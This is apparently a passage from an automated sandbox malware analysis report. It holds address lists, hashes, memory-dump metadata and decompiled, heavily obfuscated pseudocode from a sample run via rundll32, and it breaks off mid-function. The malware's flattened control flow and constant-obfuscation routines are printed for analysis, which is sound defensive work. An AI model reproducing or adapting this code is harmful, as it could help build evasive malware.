                                                                                                                      0x00173b5f
                                                                                                                      0x00173b6d
                                                                                                                      0x00173b74
                                                                                                                      0x00173b7b
                                                                                                                      0x00173b83
                                                                                                                      0x00173b84
                                                                                                                      0x00173b92
                                                                                                                      0x00173b93
                                                                                                                      0x00173b97
                                                                                                                      0x00173b9c
                                                                                                                      0x00173b9f
                                                                                                                      0x00173ba1
                                                                                                                      0x00173bf7
                                                                                                                      0x00173bf7
                                                                                                                      0x00173bf7
                                                                                                                      0x00173bc0
                                                                                                                      0x00173bc5
                                                                                                                      0x00173bc8
                                                                                                                      0x00173bcc
                                                                                                                      0x00173bd0
                                                                                                                      0x00173bd7
                                                                                                                      0x00173bde
                                                                                                                      0x00173be5
                                                                                                                      0x00000000
                                                                                                                      0x00173bea
                                                                                                                      0x001738d4
                                                                                                                      0x00173b37
                                                                                                                      0x00173b3e
                                                                                                                      0x00173b45
                                                                                                                      0x00173b4c
                                                                                                                      0x00173b53
                                                                                                                      0x00000000
                                                                                                                      0x00173b53
                                                                                                                      0x001738e0
                                                                                                                      0x00173add
                                                                                                                      0x00173adf
                                                                                                                      0x00173b17
                                                                                                                      0x00000000
                                                                                                                      0x00173b17
                                                                                                                      0x00173ae1
                                                                                                                      0x00173afd
                                                                                                                      0x00173b02
                                                                                                                      0x00173b05
                                                                                                                      0x00173b07
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00173b0d
                                                                                                                      0x001738b0
                                                                                                                      0x001738b0
                                                                                                                      0x001738b0
                                                                                                                      0x001738b5
                                                                                                                      0x001738b5
                                                                                                                      0x00000000
                                                                                                                      0x001738b5
                                                                                                                      0x001738b0
                                                                                                                      0x001738ec
                                                                                                                      0x00173ab8
                                                                                                                      0x00173ac4
                                                                                                                      0x00173acb
                                                                                                                      0x00173ad0
                                                                                                                      0x00173ad5
                                                                                                                      0x00000000
                                                                                                                      0x00173ad5
                                                                                                                      0x001738f4
                                                                                                                      0x00173a1d
                                                                                                                      0x00173a4a
                                                                                                                      0x00173a4f
                                                                                                                      0x00173a52
                                                                                                                      0x00173a54
                                                                                                                      0x00173a76
                                                                                                                      0x00173a98
                                                                                                                      0x00173a9d
                                                                                                                      0x00173a9d
                                                                                                                      0x001739fd
                                                                                                                      0x001739fd
                                                                                                                      0x00000000
                                                                                                                      0x001739fd
                                                                                                                      0x001738fa
                                                                                                                      0x00173900
                                                                                                                      0x00173b26
                                                                                                                      0x00173b26
                                                                                                                      0x00173b2c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00173b2c
                                                                                                                      0x0017391d
                                                                                                                      0x00173950
                                                                                                                      0x0017395a
                                                                                                                      0x00173962
                                                                                                                      0x00173969
                                                                                                                      0x0017397b
                                                                                                                      0x001739c1
                                                                                                                      0x001739d9
                                                                                                                      0x001739f1
                                                                                                                      0x001739f6
                                                                                                                      0x001739fb
                                                                                                                      0x00173a04
                                                                                                                      0x00173a0e
                                                                                                                      0x00173a10
                                                                                                                      0x00173a15
                                                                                                                      0x00000000
                                                                                                                      0x00173a15
                                                                                                                      0x00000000
                                                                                                                      0x001739fb
                                                                                                                      0x00173b21
                                                                                                                      0x00000000
                                                                                                                      0x00173b21
                                                                                                                      0x001738b5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $Fs$+M$4l$5N$AX$[e$[p;$^ "0$`h$aGK{$x`~${2$@"
                                                                                                                      • API String ID: 0-3551049037
                                                                                                                      • Opcode ID: 334b3f3ed5fc1b1b05f12e18cea9be60a250f22517f2bda9fd9c7e032a3f0d29
                                                                                                                      • Instruction ID: 454a083beccb63d15b77bd15e82a0d26dd2faedaa1d77205a1ef751070b35d92
                                                                                                                      • Opcode Fuzzy Hash: 334b3f3ed5fc1b1b05f12e18cea9be60a250f22517f2bda9fd9c7e032a3f0d29
                                                                                                                      • Instruction Fuzzy Hash: FA5200725093819FD379CF21C54AB9BBBE2BBC4708F10891DE2DA96260D7B18949DF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018D8D7 Relevance: 15.5, Strings: 12, Instructions: 455COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018D8D7() {
				char _v520;
				char _v1040;
				char _v1560;
				char _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				unsigned int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* _t526;
				signed int _t531;
				void* _t540;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t550;
				intOrPtr _t551;
				signed int _t552;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				void* _t568;
				void* _t625;
				signed int _t627;
				signed int* _t631;

				_t631 =  &_v1760;
				_v1616 = 0xeae527;
				_v1568 = 0;
				_t553 = 0x26;
				_v1616 = _v1616 / _t553;
				_v1616 = _v1616 ^ 0x00062e5a;
				_t625 = 0x971d92c;
				_v1596 = 0x6602e1;
				_t554 = 0x25;
				_v1596 = _v1596 / _t554;
				_v1596 = _v1596 ^ 0x8002c1cf;
				_v1644 = 0xf63434;
				_t555 = 0x47;
				_v1644 = _v1644 / _t555;
				_v1644 = _v1644 + 0xf19c;
				_v1644 = _v1644 ^ 0x00046956;
				_v1716 = 0x50524a;
				_t32 =  &_v1716; // 0x50524a
				_t556 = 0x5f;
				_v1716 =  *_t32 / _t556;
				_v1716 = _v1716 + 0xeb9a;
				_v1716 = _v1716 >> 0x10;
				_v1696 = 0xd12665;
				_v1696 = _v1696 + 0xba99;
				_v1696 = _v1696 >> 2;
				_v1696 = _v1696 ^ 0x003ae3d7;
				_v1572 = 0xb7077f;
				_v1572 = _v1572 >> 0xb;
				_v1572 = _v1572 ^ 0x00005559;
				_v1732 = 0xacadbb;
				_v1732 = _v1732 * 0x18;
				_v1732 = _v1732 + 0xffff3f00;
				_v1732 = _v1732 >> 0xb;
				_v1732 = _v1732 ^ 0x0000fc07;
				_v1628 = 0x1e838c;
				_v1628 = _v1628 + 0xffff51c5;
				_v1628 = _v1628 * 0x68;
				_v1628 = _v1628 ^ 0x0c18a6b3;
				_v1712 = 0x7a729f;
				_v1712 = _v1712 | 0x553aa77e;
				_v1712 = _v1712 ^ 0x421b02cb;
				_v1712 = _v1712 * 0x57;
				_v1712 = _v1712 ^ 0xf24da14c;
				_v1620 = 0x85e70f;
				_v1620 = _v1620 >> 0xb;
				_v1620 = _v1620 ^ 0x000e59ba;
				_v1752 = 0xad6578;
				_v1752 = _v1752 * 0x5a;
				_v1752 = _v1752 << 0xc;
				_v1752 = _v1752 << 0x10;
				_v1752 = _v1752 ^ 0x00023595;
				_v1728 = 0x3989b2;
				_v1728 = _v1728 * 0x27;
				_v1728 = _v1728 * 0x4d;
				_v1728 = _v1728 << 4;
				_v1728 = _v1728 ^ 0x2f238c3a;
				_v1744 = 0x50e625;
				_v1744 = _v1744 ^ 0x2e9ac150;
				_v1744 = _v1744 >> 2;
				_v1744 = _v1744 >> 5;
				_v1744 = _v1744 ^ 0x00596b64;
				_v1684 = 0x3fc833;
				_t557 = 0x76;
				_v1684 = _v1684 / _t557;
				_v1684 = _v1684 ^ 0xe050a76e;
				_v1684 = _v1684 ^ 0xe05ba95d;
				_v1576 = 0x904481;
				_v1576 = _v1576 | 0xbb34e4d7;
				_v1576 = _v1576 ^ 0xbbb7ee3e;
				_v1612 = 0xe49eb3;
				_v1612 = _v1612 + 0xfa7c;
				_v1612 = _v1612 ^ 0x00e777f0;
				_v1624 = 0x2dc9df;
				_v1624 = _v1624 ^ 0xfde67a02;
				_v1624 = _v1624 >> 4;
				_v1624 = _v1624 ^ 0x0fd7f95a;
				_v1688 = 0xb27c91;
				_v1688 = _v1688 + 0xcc48;
				_v1688 = _v1688 + 0xffff6aea;
				_v1688 = _v1688 ^ 0x00b739bb;
				_v1676 = 0x9962ec;
				_v1676 = _v1676 + 0xd2bc;
				_t627 = 0x59;
				_t558 = 0x22;
				_v1676 = _v1676 * 0x31;
				_v1676 = _v1676 ^ 0x1d838c0c;
				_v1720 = 0x20e7d3;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 / _t558;
				_v1720 = _v1720 / _t627;
				_v1720 = _v1720 ^ 0x0002b2fc;
				_v1652 = 0xf809ca;
				_v1652 = _v1652 | 0xf7ee8eed;
				_v1652 = _v1652 << 1;
				_v1652 = _v1652 ^ 0xeff238d7;
				_v1580 = 0x7cb108;
				_v1580 = _v1580 + 0x41b4;
				_v1580 = _v1580 ^ 0x0076b4d3;
				_v1668 = 0xb3209d;
				_t559 = 0x53;
				_v1668 = _v1668 / _t559;
				_v1668 = _v1668 << 0xd;
				_v1668 = _v1668 ^ 0x450753ed;
				_v1604 = 0x53775b;
				_v1604 = _v1604 | 0x32a41867;
				_v1604 = _v1604 ^ 0x32fba052;
				_v1636 = 0xbc3265;
				_v1636 = _v1636 + 0xffff23eb;
				_v1636 = _v1636 ^ 0xe68a0726;
				_v1636 = _v1636 ^ 0xe63f3d4e;
				_v1756 = 0xe1916f;
				_v1756 = _v1756 + 0x6ec8;
				_v1756 = _v1756 | 0xf937d932;
				_v1756 = _v1756 + 0xfffffd3f;
				_v1756 = _v1756 ^ 0xf9f085ba;
				_v1588 = 0x69c4ca;
				_v1588 = _v1588 + 0xe8a1;
				_v1588 = _v1588 ^ 0x00630ca4;
				_v1584 = 0x6b201e;
				_v1584 = _v1584 | 0x74aee044;
				_v1584 = _v1584 ^ 0x74eba3bf;
				_v1760 = 0xf230ab;
				_v1760 = _v1760 >> 9;
				_v1760 = _v1760 >> 0xa;
				_v1760 = _v1760 >> 4;
				_v1760 = _v1760 ^ 0x00016a96;
				_v1704 = 0x98b305;
				_v1704 = _v1704 + 0x69fd;
				_v1704 = _v1704 ^ 0x979b8a6a;
				_v1704 = _v1704 + 0xffff998b;
				_v1704 = _v1704 ^ 0x9709d1d7;
				_v1736 = 0xce8702;
				_v1736 = _v1736 >> 0xa;
				_v1736 = _v1736 + 0x7a8b;
				_v1736 = _v1736 << 1;
				_v1736 = _v1736 ^ 0x000e6a30;
				_v1740 = 0x4c6a4b;
				_v1740 = _v1740 << 0xb;
				_v1740 = _v1740 | 0x0577b2ac;
				_v1740 = _v1740 + 0xffff4db5;
				_v1740 = _v1740 ^ 0x6775c844;
				_v1748 = 0x8b8c8;
				_t560 = 0x14;
				_v1748 = _v1748 / _t560;
				_t561 = 0x67;
				_v1748 = _v1748 / _t561;
				_t562 = 7;
				_v1748 = _v1748 * 0x36;
				_v1748 = _v1748 ^ 0x000fee79;
				_v1660 = 0xc3e5ac;
				_v1660 = _v1660 + 0xffffa1ff;
				_t563 = 0x46;
				_v1660 = _v1660 / _t562;
				_v1660 = _v1660 ^ 0x001e32d9;
				_v1664 = 0x1a636c;
				_v1664 = _v1664 | 0xf6dbfbcf;
				_v1664 = _v1664 ^ 0xf6df054d;
				_v1724 = 0xea18bc;
				_v1724 = _v1724 / _t563;
				_v1724 = _v1724 | 0x2d596700;
				_v1724 = _v1724 >> 1;
				_v1724 = _v1724 ^ 0x16a5f059;
				_v1672 = 0x567483;
				_v1672 = _v1672 >> 7;
				_v1672 = _v1672 + 0xffffe0a0;
				_v1672 = _v1672 ^ 0x000eacf4;
				_v1680 = 0x757070;
				_v1680 = _v1680 >> 0xd;
				_v1680 = _v1680 ^ 0xeacc73ee;
				_v1680 = _v1680 ^ 0xeac5b183;
				_v1648 = 0x45ab81;
				_v1648 = _v1648 >> 6;
				_v1648 = _v1648 + 0xffff50ab;
				_v1648 = _v1648 ^ 0x000d5f86;
				_v1708 = 0x462580;
				_t564 = 0xb;
				_t550 = _v1568;
				_v1708 = _v1708 / _t564;
				_t565 = 0x75;
				_v1708 = _v1708 / _t565;
				_t566 = 0x37;
				_v1708 = _v1708 * 0x50;
				_v1708 = _v1708 ^ 0x00078e43;
				_v1592 = 0x6b02b0;
				_v1592 = _v1592 + 0xffff70eb;
				_v1592 = _v1592 ^ 0x006caa59;
				_v1600 = 0x2f56d1;
				_v1600 = _v1600 ^ 0x1dd1a998;
				_v1600 = _v1600 ^ 0x1df0badb;
				_v1656 = 0xa683af;
				_v1656 = _v1656 / _t566;
				_v1656 = _v1656 << 1;
				_v1656 = _v1656 ^ 0x0003d06f;
				_v1608 = 0x6ef6d9;
				_v1608 = _v1608 + 0xd0f0;
				_v1608 = _v1608 ^ 0x006391fa;
				_v1700 = 0x90b08b;
				_v1700 = _v1700 + 0x4c46;
				_v1700 = _v1700 | 0x5cc03ba9;
				_t567 = 0x12;
				_v1700 = _v1700 / _t567;
				_v1700 = _v1700 ^ 0x052b7d82;
				_v1692 = 0x3d9f33;
				_v1692 = _v1692 + 0xffff6a07;
				_v1692 = _v1692 ^ 0xa1c8547f;
				_v1692 = _v1692 ^ 0xa1f3c56b;
				_v1632 = 0x96979b;
				_v1632 = _v1632 / _t627;
				_v1632 = _v1632 >> 0xa;
				_v1632 = _v1632 ^ 0x0009a5bf;
				_v1640 = 0x6f31a2;
				_v1640 = _v1640 ^ 0x3a2ad5a2;
				_v1640 = _v1640 ^ 0xeb2d3a23;
				_v1640 = _v1640 ^ 0xd16332d1;
				while(1) {
					L1:
					_t568 = 0x5c;
					while(1) {
						L2:
						_t526 = 0xdd30c3;
						do {
							L3:
							if(_t625 == _t526) {
								_t531 = E0018C2CE(_v1664, _v1648, _t550, _v1708, _v1592, _v1600, _v1716, _v1656, _v1564, _v1608,  &_v1560, 2 + E0018BA68(_v1664, _v1724, _v1672,  &_v1560, _v1680) * 2);
								_t631 =  &(_t631[0xd]);
								__eflags = _t531;
								_t625 = 0xd26443e;
								_t471 = _t531 == 0;
								__eflags = _t471;
								_v1568 = 0 | _t471;
								goto L17;
							} else {
								if(_t625 == 0x971d92c) {
									_push(_t568);
									E0017EA7B( &_v520, _v1696, _v1616, _t568, _v1572, _v1732, _v1628);
									_t631 =  &(_t631[7]);
									_t625 = 0xf5a31c5;
									goto L1;
								} else {
									if(_t625 == 0x9b520f4) {
										_t551 =  *0x19520c; // 0x0
										_t552 = _t551 + 0x220;
										while(1) {
											__eflags =  *_t552 - _t568;
											if(__eflags == 0) {
												break;
											}
											_t552 = _t552 + 2;
											__eflags = _t552;
										}
										_t550 = _t552 + 2;
										_t625 = 0xaa323c9;
										goto L2;
									} else {
										if(_t625 == 0xaa323c9) {
											_push(_v1636);
											_push(_v1604);
											_t572 = _v1580;
											_push(0x17118c);
											__eflags = E00178786(_v1756, _v1668, _v1580,  &_v1564, _v1588, E0017AB66(_v1580, _v1668, __eflags), _v1584, _v1760, _v1580, _t572, _v1704, _v1644, _v1596, _t572, _v1736);
											_t625 =  ==  ? 0xdd30c3 : 0x546d466;
											E0017AE03(_v1740, _v1748, _v1660, _t534);
											_t631 =  &(_t631[0x12]);
											L17:
											_t526 = 0xdd30c3;
											_t568 = 0x5c;
											goto L18;
										} else {
											if(_t625 == 0xd26443e) {
												E00177AF8(_v1700, _v1692, _v1564, _v1632, _v1640);
											} else {
												_t640 = _t625 - 0xf5a31c5;
												if(_t625 != 0xf5a31c5) {
													goto L18;
												} else {
													_push(_v1728);
													_push(_v1752);
													_push(0x1710fc);
													_t540 = E0017AB66(_v1712, _v1620, _t640);
													E0018C66E( &_v1040, _t640);
													_t544 =  *0x19520c; // 0x0
													_t546 =  *0x19520c; // 0x0
													_t427 =  &_v1684; // 0xe63f3d4e
													E0018BDB5( &_v1560, _t640, _v1744,  *_t427, _v1576, _v1612, _t546 + 0x220, _v1624, _v1688, _t544 + 8,  &_v1040,  &_v520, _t540);
													E0017AE03(_v1676, _v1720, _v1652, _t540);
													_t631 =  &(_t631[0x10]);
													_t625 = 0x9b520f4;
													while(1) {
														L1:
														_t568 = 0x5c;
														L2:
														_t526 = 0xdd30c3;
														goto L3;
													}
												}
											}
										}
									}
								}
							}
							L21:
							return _v1568;
							L18:
							__eflags = _t625 - 0x546d466;
						} while (__eflags != 0);
						goto L21;
					}
				}
			}



















































































                                                                                                                      0x0018d8d7
                                                                                                                      0x0018d8dd
                                                                                                                      0x0018d8ec
                                                                                                                      0x0018d900
                                                                                                                      0x0018d905
                                                                                                                      0x0018d90e
                                                                                                                      0x0018d919
                                                                                                                      0x0018d91e
                                                                                                                      0x0018d930
                                                                                                                      0x0018d935
                                                                                                                      0x0018d93e
                                                                                                                      0x0018d949
                                                                                                                      0x0018d95b
                                                                                                                      0x0018d960
                                                                                                                      0x0018d969
                                                                                                                      0x0018d974
                                                                                                                      0x0018d97f
                                                                                                                      0x0018d987
                                                                                                                      0x0018d98b
                                                                                                                      0x0018d98e
                                                                                                                      0x0018d992
                                                                                                                      0x0018d99a
                                                                                                                      0x0018d9a7
                                                                                                                      0x0018d9af
                                                                                                                      0x0018d9b7
                                                                                                                      0x0018d9bc
                                                                                                                      0x0018d9c4
                                                                                                                      0x0018d9cf
                                                                                                                      0x0018d9d7
                                                                                                                      0x0018d9e2
                                                                                                                      0x0018d9ef
                                                                                                                      0x0018d9f3
                                                                                                                      0x0018d9fb
                                                                                                                      0x0018da00
                                                                                                                      0x0018da08
                                                                                                                      0x0018da13
                                                                                                                      0x0018da26
                                                                                                                      0x0018da2d
                                                                                                                      0x0018da38
                                                                                                                      0x0018da40
                                                                                                                      0x0018da48
                                                                                                                      0x0018da55
                                                                                                                      0x0018da59
                                                                                                                      0x0018da61
                                                                                                                      0x0018da6c
                                                                                                                      0x0018da74
                                                                                                                      0x0018da7f
                                                                                                                      0x0018da8c
                                                                                                                      0x0018da90
                                                                                                                      0x0018da95
                                                                                                                      0x0018da9a
                                                                                                                      0x0018daa2
                                                                                                                      0x0018daaf
                                                                                                                      0x0018dab8
                                                                                                                      0x0018dabc
                                                                                                                      0x0018dac3
                                                                                                                      0x0018dacb
                                                                                                                      0x0018dad3
                                                                                                                      0x0018dadb
                                                                                                                      0x0018dae0
                                                                                                                      0x0018dae5
                                                                                                                      0x0018daed
                                                                                                                      0x0018dafb
                                                                                                                      0x0018db00
                                                                                                                      0x0018db04
                                                                                                                      0x0018db0c
                                                                                                                      0x0018db14
                                                                                                                      0x0018db1f
                                                                                                                      0x0018db2a
                                                                                                                      0x0018db35
                                                                                                                      0x0018db40
                                                                                                                      0x0018db4b
                                                                                                                      0x0018db56
                                                                                                                      0x0018db61
                                                                                                                      0x0018db6c
                                                                                                                      0x0018db74
                                                                                                                      0x0018db7f
                                                                                                                      0x0018db87
                                                                                                                      0x0018db8f
                                                                                                                      0x0018db97
                                                                                                                      0x0018db9f
                                                                                                                      0x0018dba7
                                                                                                                      0x0018dbb6
                                                                                                                      0x0018dbb9
                                                                                                                      0x0018dbba
                                                                                                                      0x0018dbbe
                                                                                                                      0x0018dbc6
                                                                                                                      0x0018dbd6
                                                                                                                      0x0018dbe2
                                                                                                                      0x0018dbee
                                                                                                                      0x0018dbf4
                                                                                                                      0x0018dbfc
                                                                                                                      0x0018dc07
                                                                                                                      0x0018dc12
                                                                                                                      0x0018dc19
                                                                                                                      0x0018dc24
                                                                                                                      0x0018dc2f
                                                                                                                      0x0018dc3a
                                                                                                                      0x0018dc45
                                                                                                                      0x0018dc51
                                                                                                                      0x0018dc54
                                                                                                                      0x0018dc58
                                                                                                                      0x0018dc5d
                                                                                                                      0x0018dc65
                                                                                                                      0x0018dc70
                                                                                                                      0x0018dc7b
                                                                                                                      0x0018dc86
                                                                                                                      0x0018dc91
                                                                                                                      0x0018dc9c
                                                                                                                      0x0018dca7
                                                                                                                      0x0018dcb2
                                                                                                                      0x0018dcba
                                                                                                                      0x0018dcc2
                                                                                                                      0x0018dcca
                                                                                                                      0x0018dcd2
                                                                                                                      0x0018dcda
                                                                                                                      0x0018dce7
                                                                                                                      0x0018dcf2
                                                                                                                      0x0018dcfd
                                                                                                                      0x0018dd08
                                                                                                                      0x0018dd13
                                                                                                                      0x0018dd1e
                                                                                                                      0x0018dd26
                                                                                                                      0x0018dd2b
                                                                                                                      0x0018dd30
                                                                                                                      0x0018dd35
                                                                                                                      0x0018dd3d
                                                                                                                      0x0018dd45
                                                                                                                      0x0018dd4d
                                                                                                                      0x0018dd55
                                                                                                                      0x0018dd5d
                                                                                                                      0x0018dd65
                                                                                                                      0x0018dd6d
                                                                                                                      0x0018dd72
                                                                                                                      0x0018dd7a
                                                                                                                      0x0018dd7e
                                                                                                                      0x0018dd86
                                                                                                                      0x0018dd8e
                                                                                                                      0x0018dd93
                                                                                                                      0x0018dd9b
                                                                                                                      0x0018dda3
                                                                                                                      0x0018ddab
                                                                                                                      0x0018ddb9
                                                                                                                      0x0018ddbe
                                                                                                                      0x0018ddc8
                                                                                                                      0x0018ddcd
                                                                                                                      0x0018ddd8
                                                                                                                      0x0018dddb
                                                                                                                      0x0018dddf
                                                                                                                      0x0018dde7
                                                                                                                      0x0018ddef
                                                                                                                      0x0018ddfd
                                                                                                                      0x0018ddfe
                                                                                                                      0x0018de04
                                                                                                                      0x0018de0c
                                                                                                                      0x0018de14
                                                                                                                      0x0018de1c
                                                                                                                      0x0018de24
                                                                                                                      0x0018de34
                                                                                                                      0x0018de38
                                                                                                                      0x0018de40
                                                                                                                      0x0018de44
                                                                                                                      0x0018de4c
                                                                                                                      0x0018de54
                                                                                                                      0x0018de59
                                                                                                                      0x0018de61
                                                                                                                      0x0018de69
                                                                                                                      0x0018de71
                                                                                                                      0x0018de76
                                                                                                                      0x0018de7e
                                                                                                                      0x0018de86
                                                                                                                      0x0018de91
                                                                                                                      0x0018de99
                                                                                                                      0x0018dea4
                                                                                                                      0x0018deb1
                                                                                                                      0x0018debd
                                                                                                                      0x0018dec2
                                                                                                                      0x0018dec9
                                                                                                                      0x0018ded8
                                                                                                                      0x0018dedd
                                                                                                                      0x0018dee8
                                                                                                                      0x0018deeb
                                                                                                                      0x0018deef
                                                                                                                      0x0018def7
                                                                                                                      0x0018df02
                                                                                                                      0x0018df0d
                                                                                                                      0x0018df18
                                                                                                                      0x0018df23
                                                                                                                      0x0018df2e
                                                                                                                      0x0018df39
                                                                                                                      0x0018df49
                                                                                                                      0x0018df4d
                                                                                                                      0x0018df51
                                                                                                                      0x0018df59
                                                                                                                      0x0018df64
                                                                                                                      0x0018df6f
                                                                                                                      0x0018df7a
                                                                                                                      0x0018df82
                                                                                                                      0x0018df8a
                                                                                                                      0x0018df96
                                                                                                                      0x0018df9b
                                                                                                                      0x0018df9f
                                                                                                                      0x0018dfa7
                                                                                                                      0x0018dfaf
                                                                                                                      0x0018dfb7
                                                                                                                      0x0018dfbf
                                                                                                                      0x0018dfc7
                                                                                                                      0x0018dfdb
                                                                                                                      0x0018dfe2
                                                                                                                      0x0018dfea
                                                                                                                      0x0018dff5
                                                                                                                      0x0018e000
                                                                                                                      0x0018e00b
                                                                                                                      0x0018e016
                                                                                                                      0x0018e021
                                                                                                                      0x0018e021
                                                                                                                      0x0018e023
                                                                                                                      0x0018e024
                                                                                                                      0x0018e024
                                                                                                                      0x0018e024
                                                                                                                      0x0018e029
                                                                                                                      0x0018e029
                                                                                                                      0x0018e02b
                                                                                                                      0x0018e25d
                                                                                                                      0x0018e264
                                                                                                                      0x0018e267
                                                                                                                      0x0018e269
                                                                                                                      0x0018e26e
                                                                                                                      0x0018e26e
                                                                                                                      0x0018e271
                                                                                                                      0x00000000
                                                                                                                      0x0018e031
                                                                                                                      0x0018e037
                                                                                                                      0x0018e1c5
                                                                                                                      0x0018e1eb
                                                                                                                      0x0018e1f0
                                                                                                                      0x0018e1f3
                                                                                                                      0x00000000
                                                                                                                      0x0018e03d
                                                                                                                      0x0018e043
                                                                                                                      0x0018e1a5
                                                                                                                      0x0018e1ab
                                                                                                                      0x0018e1b6
                                                                                                                      0x0018e1b6
                                                                                                                      0x0018e1b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018e1b3
                                                                                                                      0x0018e1b3
                                                                                                                      0x0018e1b3
                                                                                                                      0x0018e1bb
                                                                                                                      0x0018e1be
                                                                                                                      0x00000000
                                                                                                                      0x0018e049
                                                                                                                      0x0018e04b
                                                                                                                      0x0018e113
                                                                                                                      0x0018e11a
                                                                                                                      0x0018e125
                                                                                                                      0x0018e12c
                                                                                                                      0x0018e179
                                                                                                                      0x0018e195
                                                                                                                      0x0018e198
                                                                                                                      0x0018e19d
                                                                                                                      0x0018e278
                                                                                                                      0x0018e27a
                                                                                                                      0x0018e27f
                                                                                                                      0x00000000
                                                                                                                      0x0018e051
                                                                                                                      0x0018e057
                                                                                                                      0x0018e2ab
                                                                                                                      0x0018e05d
                                                                                                                      0x0018e05d
                                                                                                                      0x0018e063
                                                                                                                      0x00000000
                                                                                                                      0x0018e069
                                                                                                                      0x0018e069
                                                                                                                      0x0018e06d
                                                                                                                      0x0018e07c
                                                                                                                      0x0018e081
                                                                                                                      0x0018e08f
                                                                                                                      0x0018e0aa
                                                                                                                      0x0018e0c5
                                                                                                                      0x0018e0de
                                                                                                                      0x0018e0e9
                                                                                                                      0x0018e101
                                                                                                                      0x0018e106
                                                                                                                      0x0018e109
                                                                                                                      0x0018e021
                                                                                                                      0x0018e021
                                                                                                                      0x0018e023
                                                                                                                      0x0018e024
                                                                                                                      0x0018e024
                                                                                                                      0x00000000
                                                                                                                      0x0018e024
                                                                                                                      0x0018e021
                                                                                                                      0x0018e063
                                                                                                                      0x0018e057
                                                                                                                      0x0018e04b
                                                                                                                      0x0018e043
                                                                                                                      0x0018e037
                                                                                                                      0x0018e2b3
                                                                                                                      0x0018e2c4
                                                                                                                      0x0018e280
                                                                                                                      0x0018e280
                                                                                                                      0x0018e280
                                                                                                                      0x00000000
                                                                                                                      0x0018e28c
                                                                                                                      0x0018e024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #:-$'$>D&$>D&$FL$JRP$KjL$N=?$YU$[wS$dkY$ppu
                                                                                                                      • API String ID: 0-3845620242
                                                                                                                      • Opcode ID: 844e1a6f6fc519cc7e6a2814eb35c08057b69925ed6020bbd54e9254ca568998
                                                                                                                      • Instruction ID: a49671fc6e225b4c7f785a25eae853ca55a0aa718dac44013f98df79f78ad985
                                                                                                                      • Opcode Fuzzy Hash: 844e1a6f6fc519cc7e6a2814eb35c08057b69925ed6020bbd54e9254ca568998
                                                                                                                      • Instruction Fuzzy Hash: 9532F172508380DFE368CF65C94AA8FBBE2FBC4718F10891DE19986260D7B59949CF47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0018EE94 Relevance: 14.2, Strings: 11, Instructions: 427COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0018EE94(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
